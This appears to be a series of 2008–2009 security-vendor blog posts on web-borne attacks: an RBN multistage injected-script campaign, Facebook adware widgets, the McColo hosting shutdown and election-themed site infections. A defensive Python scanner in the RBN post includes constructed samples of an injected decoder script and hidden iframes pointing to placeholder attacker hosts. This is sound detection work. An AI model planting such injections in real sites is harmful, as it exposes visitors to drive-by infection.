2/5/2009 7:40:00 PM

The latest undetected malweb by RBN

by Rony Michaely

eSafe AID (the Attack Intelligence Datacenter) has recently discovered a new, massive Web attack operated by RBN, in which exploit code is injected into compromised legitimate websites. The injected obfuscated malicious script points to a remote obfuscated hidden IFrame, which in turn leads to another obfuscated exploit. The last stage of this multistage Web attack includes Adobe PDF and Windows Media Encoder exploit variants.

The attack stages:

The first obfuscated exploit code has a low detection rate among anti-virus vendors. eSafe detects the exploit as JS.Agent.au.

(Image showing the obfuscated exploit code)

(Image showing the VirusTotal results)

The attack stages in brief:

1. A user visits a legitimate hacked website, where an obfuscated script leads to other hacked websites.
2. The second-stage hacked websites, located in Ukraine, contain obfuscated hidden IFrames that lead to the hacker's server.
3. The obfuscated exploit code on the hacker's server contains Adobe PDF and Windows Media Encoder exploit variants.
4. Affected systems are automatically joined to a bot controller located in Luxembourg.

Tracking the footprints of these domains leads to the infamous RBN (hosting illegal sites, DDoS attacks, hacking, and pornography).
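A defender-side check for the stage-one and stage-two footprints described above (a decoder script fed by a long escaped string injected into a page, and a hidden IFrame pointing to another host), as an added example that is not part of the original post; the sample pages, script body and hostnames are constructed placeholders, not the real injected code.

```python
import re

# Constructed sample pages mirroring the stages described in the post; the
# script body and hostnames are invented placeholders, not the real injected code.
STAGE1_PAGE = """<html><body><h1>Legit site</h1>
<script>var s="%3C%69%66%72%61%6D%65%20%73%72%63%3D%22http://stage2.example.invalid/%22%3E";
document.write(unescape(s));</script></body></html>"""
STAGE2_PAGE = """<html><body><p>Hosted page</p>
<iframe src="http://stage3.example.invalid/in.php" width=0 height=0 frameborder=0></iframe>
<iframe src='http://stage3.example.invalid/x.php' style="display: none"></iframe>
</body></html>"""
CLEAN_PAGE = """<html><body>
<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>
<script>document.getElementById("x").textContent = "hello";</script></body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
DECODER_RE = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(")
ESCAPE_RE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.I)

def parse_attrs(tag: str) -> dict:
    """Return lower-cased attribute name/value pairs of a single HTML tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "").lower()
            for m in ATTR_RE.finditer(tag)}

def iframe_is_hidden(attrs: dict) -> bool:
    """Zero/one-pixel frames, CSS-hidden frames and frames pushed far off-screen."""
    dims = [attrs.get(a, "").removesuffix("px") for a in ("width", "height")]
    style = re.sub(r"\s+", "", attrs.get("style", ""))
    return (any(d in ("0", "1") for d in dims)
            or "display:none" in style or "visibility:hidden" in style
            or re.search(r"(left|top):-\d{3,}", style) is not None)

def script_looks_obfuscated(body: str, min_escapes: int = 8) -> bool:
    """A decoder call (eval/unescape/fromCharCode) fed by a long escaped string."""
    return bool(DECODER_RE.search(body)) and len(ESCAPE_RE.findall(body)) >= min_escapes

def scan_page(html: str) -> list:
    """Return (finding_kind, detail) pairs for hidden iframes and obfuscated scripts."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        attrs = parse_attrs(tag)
        if iframe_is_hidden(attrs):
            findings.append(("hidden_iframe", attrs.get("src", "")))
    for body in SCRIPT_RE.findall(html):
        if script_looks_obfuscated(body):
            findings.append(("obfuscated_script", body.strip()[:40]))
    return findings
```

Run `scan_page` over a crawled copy of a site you own to surface injected decoder scripts and hidden frames; thresholds such as `min_escapes` are heuristics and should be tuned against known-clean pages.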


Tags: Malweb | Hackers | eCrime

1/8/2009 12:14:00 PM

Social networking strikes again

by Iftach Ian Amit

A lot of write-ups have been covering this, so here are a few from InformationWeek, Dancho, SCMagazine and McAfee.

Besides saying the ever-satisfying "told you so", there is not much to add here. More bogus profiles entice users to connect to them, look at the content, and catch the same old nastiness, only packaged in another format. Just remember that social networks, just like real life, can be a great playground for eCriminals, and this is just the tip of the iceberg. What would happen if you saw the profile of a person you actually know on LinkedIn (or any other network, for that matter) and clicked on a link from it that was actually malicious? That would be much more effective, and not that far-fetched, would it?


Tags: Malweb

11/12/2008 12:28:00 PM

Hosting provider crackdown?

by Iftach Ian Amit

Recently, there has been a lot of focus from the security research community on a hosting provider named McColo Corporation (out of San Jose, CA). Reports on spam, phishing and connections to Malweb distribution, among others, have been accumulating (including our own analysis of a malicious server that was found to be administered from a McColo address).

It seems the combination of law enforcement investigations and a recent story by the Washington Post has made its mark, and McColo's IP addresses have been silent since yesterday. We'll be looking forward to additional coverage on this in the coming days, as we are finalizing our own threat report on the eCrime server that was analyzed, and on which we found the 200,000 compromised FTP credentials.


Tags: Malweb

11/3/2008 12:41:00 PM

Secret Crush Widget is Back to Spread Adware on Facebook

by Oren Medini

Secret Crush invites Facebook users to find out which of their friends is secretly in love with them. Users who click the link find out that it is actually an adware application targeting them.

This malicious widget made its first appearance in early January 2008. It played on the popularity of Facebook and managed to entice millions of Facebook users to download the infamous Zango adware. Recently, this malicious widget has reappeared and has been infecting users with additional adware such as Zwinky. Facebook users receive an invitation that says: "Someone has a secret crush on you. Find Out Who!" Clicking the "Find Out Who!" link randomly redirects the browser to one of a number of websites, ranging from hosted ads to adware-serving domains.

Here is what the application's invitation message looks like:

(Image showing the Secret Crush invitation message)

And here are the adware websites that users get redirected to:

(Images showing the adware websites users are redirected to)


Tags: Malweb

10/28/2008 10:32:00 PM

Obama Leads in US Presidential Election Poll - the eCrime Way

by Iftach Ian Amit

And the leader, according to the highly non-scientific research done using Google for a specific attack vector, is: Barack Obama. Obama-related sites have been infected in such a way that they attack their visitors in 364 separate instances, while McCain is right behind with 230 instances.

As always, and as we have reported in the past, those behind eCrime are watching the news as diligently as the rest of us and are “affected” by current affairs in terms of the ways they tune their attack vector to achieve maximum exposure to their target market. The financial situation, jobs, housing, and now the US elections are causing a shift in the context of the sites targeted to carry malicious code and perform web attacks in order to gain as many “eyeballs” as possible.

Now, given that this example is just the tip of the iceberg and only gives a general idea of one specific attack vector, the conclusion about the global magnitude of having relevant sites infected with Malweb is pretty obvious. Do the math: Google's own tools give some pretty insightful data on search trends (and thus on the chances of a site coming up in one of the first 100 results for such search terms), both for sociological and technological studies and for eCrime market-reach optimization.

(Image showing Google’s trends search volume for the phrases “john mccain” and “barack obama”)

That is why security research is a little more than just playing cat-and-mouse with a technological attack or a new vulnerability. Security research is also about understanding the motives and MO of the attackers, in order to be prepared for the next wave and the next technological advancements.


Tags: Malweb | Hackers